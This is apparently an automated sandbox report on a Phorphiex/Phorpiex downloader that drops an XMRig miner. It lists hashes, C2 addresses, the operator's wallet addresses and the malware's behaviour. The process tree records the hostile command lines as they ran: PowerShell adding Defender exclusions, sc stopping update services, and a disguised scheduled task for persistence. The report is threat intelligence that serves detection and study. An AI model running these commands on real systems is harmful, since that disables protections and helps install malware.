Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2024 09:09

General

  • Target

    SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe

  • Size

    92KB

  • MD5

    be9388b42333b3d4e163b0ace699897b

  • SHA1

    4e1109772eb9cb59c557380822166fe1664403bd

  • SHA256

    d281e0a0f1e1073f2d290a7eb1f77bed4c210dbf83a0f4f4e22073f50faa843f

  • SHA512

    5f887f1060b898c9a88745cde7cf509fdf42947ab8e5948b46c2df659468dc245b24d089bdbec0b314c40b83934698bf4b6feb8954e32810ff8f522aab0af19a

  • SSDEEP

    1536:s9Ww4/inFmav82M1KeKKHqW4KYFqkKUSne1wjAUG94wU3K:UWwohOT44KktKGa87U3K

Malware Config

Extracted

Family

phorphiex

C2

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

LLeT2zkStY3cvxMBFhoWXkG5VuZPoezduv

rwc4LVd9ABpULQ1CuCpDkgX2xVB1fUijyb

4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

17hgMFyLDwMjxWqw5GhijhnPdJDyFDqecY

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1epx67ne4vckqmaj4gwke8m322f4yjr6eh52wqw

bc1qmpkehfffkr6phuklsksnd7nhgx0369sxu772m3

bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3

Attributes
  • mutex

    x88767657x

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

Signatures

  • Modifies security service 2 TTPs 1 IoCs
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 57 IoCs
  • Suspicious use of SendNotifyMessage 57 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3536
      • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe
        "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe"
        2⤵
        • Adds Run key to start application
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4228
        • C:\Windows\sysmysldrv.exe
          C:\Windows\sysmysldrv.exe
          3⤵
          • Modifies security service
          • Windows security bypass
          • Checks computer location settings
          • Executes dropped EXE
          • Windows security modification
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4488
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2496
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1012
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:556
            • C:\Windows\SysWOW64\sc.exe
              sc stop UsoSvc
              5⤵
              • Launches sc.exe
              • System Location Discovery: System Language Discovery
              PID:4244
            • C:\Windows\SysWOW64\sc.exe
              sc stop WaaSMedicSvc
              5⤵
              • Launches sc.exe
              • System Location Discovery: System Language Discovery
              PID:3124
            • C:\Windows\SysWOW64\sc.exe
              sc stop wuauserv
              5⤵
              • Launches sc.exe
              • System Location Discovery: System Language Discovery
              PID:1536
            • C:\Windows\SysWOW64\sc.exe
              sc stop DoSvc
              5⤵
              • Launches sc.exe
              • System Location Discovery: System Language Discovery
              PID:2044
            • C:\Windows\SysWOW64\sc.exe
              sc stop BITS
              5⤵
              • Launches sc.exe
              • System Location Discovery: System Language Discovery
              PID:3232
          • C:\Users\Admin\AppData\Local\Temp\255657653.exe
            C:\Users\Admin\AppData\Local\Temp\255657653.exe
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2584
          • C:\Users\Admin\AppData\Local\Temp\2927031737.exe
            C:\Users\Admin\AppData\Local\Temp\2927031737.exe
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1676
          • C:\Users\Admin\AppData\Local\Temp\135095182.exe
            C:\Users\Admin\AppData\Local\Temp\135095182.exe
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3216
            • C:\Users\Admin\AppData\Local\Temp\3328131379.exe
              C:\Users\Admin\AppData\Local\Temp\3328131379.exe
              5⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4428
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4848
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
        2⤵
          PID:3812
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3124
        • C:\Windows\System32\notepad.exe
          C:\Windows\System32\notepad.exe
          2⤵
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:3512
      • C:\Users\Admin\Windows Upgrade\wupgrdsv.exe
        "C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2696

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        fee026663fcb662152188784794028ee

        SHA1

        3c02a26a9cb16648fad85c6477b68ced3cb0cb45

        SHA256

        dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b

        SHA512

        7b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        18KB

        MD5

        8453154bb32b9ac24961a6c1b99120da

        SHA1

        ae834f99d7d81dccbd9b356dda4ce53a5108a6ff

        SHA256

        099661917ffec204976357ce06d5ba4594f7357128531027e8cde2677b42df03

        SHA512

        8f3775800a8fc10036bd84bb7a1407bd6ba3763739d94a1b63eb3a5d0c9efe54a0b7c36a8c484fb26d650f0a5fa4f4adeb83a13434c27b6ec0dc43f6ada48369

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        d95b08252ed624f6d91b46523f110f29

        SHA1

        17577997bc1fb5d3fbe59be84013165534415dc3

        SHA256

        342ce7c39bf9992d31d4b61ef138b2b084c96c74736ed00bb19aae49be16ca02

        SHA512

        0c4288176d56f4ee6d8f08f568fba07ad859f50a395c39d2afd3baf55d3d29ca065a1ce305d1bd790477c35977c0ffa230543e805622f80a77bcee71b24eb257

      • C:\Users\Admin\AppData\Local\Temp\135095182.exe

        Filesize

        10KB

        MD5

        4fe8dc617311f7b6a4b8ebe0b1e24090

        SHA1

        2bd9341f17c8c0c62e56e1863b1d2f9c43cb30e5

        SHA256

        5016e413b0c563efc920165e7235c9f2706808877668bd297b41435acc7aade4

        SHA512

        910a12fbaffd45b0f797a95c6678a32c4a27adbb7d1474f183f8863d310d31fbba17d5d747da87ac4a30dd7cb22c67a4d1c25b302ef0c3f6954d91a459c692db

      • C:\Users\Admin\AppData\Local\Temp\255657653.exe

        Filesize

        7KB

        MD5

        af0622340ed8ba48efa92e0b2d9aca7b

        SHA1

        77e7181b4d4e6957cf13ba37f590cf219aac88cb

        SHA256

        7b7d433c6c204ed3bcd1ea74106592edfa1a30b6ef7bbc3ed21efcbadc51e526

        SHA512

        e1368c1c292789115b51cae549bd2d484dbc614eb3e57aa5fce324385d28e9fbddf60064b4c88237b38cded294d090d07c491b646651c45bcd6235630d94ef46

      • C:\Users\Admin\AppData\Local\Temp\3328131379.exe

        Filesize

        5.4MB

        MD5

        41ab08c1955fce44bfd0c76a64d1945a

        SHA1

        2b9cb05f4de5d98c541d15175d7f0199cbdd0eea

        SHA256

        dd12cb27b3867341bf6ca48715756500d3ec56c19b21bb1c1290806aa74cb493

        SHA512

        38834ae703a8541b4fec9a1db94cfe296ead58649bb1d4873b517df14d0c6a9d25e49ff04c2bf6bb0188845116a4e894aae930d849f9be8c98d2ce51da1ef116

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dhsdvgyn.01n.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Windows\sysmysldrv.exe

        Filesize

        92KB

        MD5

        be9388b42333b3d4e163b0ace699897b

        SHA1

        4e1109772eb9cb59c557380822166fe1664403bd

        SHA256

        d281e0a0f1e1073f2d290a7eb1f77bed4c210dbf83a0f4f4e22073f50faa843f

        SHA512

        5f887f1060b898c9a88745cde7cf509fdf42947ab8e5948b46c2df659468dc245b24d089bdbec0b314c40b83934698bf4b6feb8954e32810ff8f522aab0af19a

      • memory/1012-22-0x0000000006490000-0x00000000064C2000-memory.dmp

        Filesize

        200KB

      • memory/1012-8-0x0000000005800000-0x0000000005866000-memory.dmp

        Filesize

        408KB

      • memory/1012-20-0x0000000005EB0000-0x0000000005ECE000-memory.dmp

        Filesize

        120KB

      • memory/1012-23-0x000000006FEE0000-0x000000006FF2C000-memory.dmp

        Filesize

        304KB

      • memory/1012-34-0x00000000070A0000-0x0000000007143000-memory.dmp

        Filesize

        652KB

      • memory/1012-33-0x00000000064D0000-0x00000000064EE000-memory.dmp

        Filesize

        120KB

      • memory/1012-35-0x0000000007880000-0x0000000007EFA000-memory.dmp

        Filesize

        6.5MB

      • memory/1012-36-0x0000000007200000-0x000000000721A000-memory.dmp

        Filesize

        104KB

      • memory/1012-37-0x0000000007250000-0x000000000725A000-memory.dmp

        Filesize

        40KB

      • memory/1012-38-0x0000000007460000-0x00000000074F6000-memory.dmp

        Filesize

        600KB

      • memory/1012-39-0x00000000073F0000-0x0000000007401000-memory.dmp

        Filesize

        68KB

      • memory/1012-40-0x0000000007420000-0x000000000742E000-memory.dmp

        Filesize

        56KB

      • memory/1012-41-0x0000000007430000-0x0000000007444000-memory.dmp

        Filesize

        80KB

      • memory/1012-42-0x0000000007520000-0x000000000753A000-memory.dmp

        Filesize

        104KB

      • memory/1012-43-0x0000000007500000-0x0000000007508000-memory.dmp

        Filesize

        32KB

      • memory/1012-19-0x00000000058E0000-0x0000000005C34000-memory.dmp

        Filesize

        3.3MB

      • memory/1012-9-0x0000000005870000-0x00000000058D6000-memory.dmp

        Filesize

        408KB

      • memory/1012-21-0x0000000005EE0000-0x0000000005F2C000-memory.dmp

        Filesize

        304KB

      • memory/1012-7-0x0000000004F00000-0x0000000004F22000-memory.dmp

        Filesize

        136KB

      • memory/1012-5-0x00000000028C0000-0x00000000028F6000-memory.dmp

        Filesize

        216KB

      • memory/1012-6-0x00000000050A0000-0x00000000056C8000-memory.dmp

        Filesize

        6.2MB

      • memory/2696-102-0x00007FF7EA840000-0x00007FF7EADB6000-memory.dmp

        Filesize

        5.5MB

      • memory/3512-103-0x000001CF89E80000-0x000001CF89EA0000-memory.dmp

        Filesize

        128KB

      • memory/3512-105-0x00007FF79BD40000-0x00007FF79C52F000-memory.dmp

        Filesize

        7.9MB

      • memory/3512-106-0x00007FF79BD40000-0x00007FF79C52F000-memory.dmp

        Filesize

        7.9MB

      • memory/3512-107-0x00007FF79BD40000-0x00007FF79C52F000-memory.dmp

        Filesize

        7.9MB

      • memory/3512-108-0x00007FF79BD40000-0x00007FF79C52F000-memory.dmp

        Filesize

        7.9MB

      • memory/3512-109-0x00007FF79BD40000-0x00007FF79C52F000-memory.dmp

        Filesize

        7.9MB

      • memory/3512-110-0x00007FF79BD40000-0x00007FF79C52F000-memory.dmp

        Filesize

        7.9MB

      • memory/3512-112-0x00007FF79BD40000-0x00007FF79C52F000-memory.dmp

        Filesize

        7.9MB

      • memory/3512-113-0x00007FF79BD40000-0x00007FF79C52F000-memory.dmp

        Filesize

        7.9MB

      • memory/4428-86-0x00007FF752710000-0x00007FF752C86000-memory.dmp

        Filesize

        5.5MB

      • memory/4848-80-0x000001F8A9680000-0x000001F8A96A2000-memory.dmp

        Filesize

        136KB